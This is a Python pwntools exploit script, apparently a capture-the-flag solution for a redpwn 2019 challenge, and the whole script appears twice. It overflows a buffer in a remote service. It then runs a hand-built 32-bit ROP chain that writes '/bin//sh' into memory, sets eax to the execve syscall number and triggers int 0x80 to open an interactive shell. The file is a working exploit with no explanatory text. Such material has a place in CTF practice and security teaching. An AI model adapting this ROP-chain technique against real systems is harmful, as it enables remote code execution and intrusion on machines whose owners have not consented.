swt02026/bronze.py

## bronze.py
import struct
from pwn import *
r=remote('chall2.2019.redpwn.net', 4004)
#r=process('/home/ubuntu/environment/bronze_ropchain')
#raw_input()
# Padding goes here
p = 'a'*(0x18 +4)


#p += struct.pack('<I', 0x080a8e86) # pop eax ; ret
p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
p += '/bin'
p += struct.pack('<I', 0x08064904) # mov eax, edx ; ret
p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
p += struct.pack('<I', 0x080da060) # @ .data
p += struct.pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret


#p += struct.pack('<I', 0x080a8e86) # pop eax ; ret
p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
p += '//sh'
p += struct.pack('<I', 0x08064904) # mov eax, edx ; ret
p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
p += struct.pack('<I', 0x080da064) # @ .data + 4

p += struct.pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
p += struct.pack('<I', 0x080da068) # @ .data + 8
p += struct.pack('<I', 0x080565a0) # xor eax, eax ; ret
p += struct.pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += struct.pack('<I', 0x080481c9) # pop ebx ; ret
p += struct.pack('<I', 0x080da060) # @ .data
p += struct.pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
p += struct.pack('<I', 0x080da068) # @ .data + 8
p += struct.pack('<I', 0x080da060) # padding without overwrite ebx
p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
p += struct.pack('<I', 0x080da068) # @ .data + 8
p += struct.pack('<I', 0x080565a0) # xor eax, eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
p += struct.pack('<I', 0x080495b3) # int 0x80
print(len(p))

r.sendlineafter('name?', p)

r.interactive()
	import struct
	from pwn import *
	r=remote('chall2.2019.redpwn.net', 4004)
	#r=process('/home/ubuntu/environment/bronze_ropchain')
	#raw_input()
	# Padding goes here
	p = 'a'*(0x18 +4)


	#p += struct.pack('<I', 0x080a8e86) # pop eax ; ret
	p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
	p += '/bin'
	p += struct.pack('<I', 0x08064904) # mov eax, edx ; ret
	p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
	p += struct.pack('<I', 0x080da060) # @ .data
	p += struct.pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret



	#p += struct.pack('<I', 0x080a8e86) # pop eax ; ret
	p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
	p += '//sh'
	p += struct.pack('<I', 0x08064904) # mov eax, edx ; ret
	p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
	p += struct.pack('<I', 0x080da064) # @ .data + 4

	p += struct.pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
	p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
	p += struct.pack('<I', 0x080da068) # @ .data + 8
	p += struct.pack('<I', 0x080565a0) # xor eax, eax ; ret
	p += struct.pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
	p += struct.pack('<I', 0x080481c9) # pop ebx ; ret
	p += struct.pack('<I', 0x080da060) # @ .data
	p += struct.pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
	p += struct.pack('<I', 0x080da068) # @ .data + 8
	p += struct.pack('<I', 0x080da060) # padding without overwrite ebx
	p += struct.pack('<I', 0x0806ef2b) # pop edx ; ret
	p += struct.pack('<I', 0x080da068) # @ .data + 8
	p += struct.pack('<I', 0x080565a0) # xor eax, eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x0807c3ba) # inc eax ; ret
	p += struct.pack('<I', 0x080495b3) # int 0x80
	print(len(p))

	r.sendlineafter('name?', p)

	r.interactive()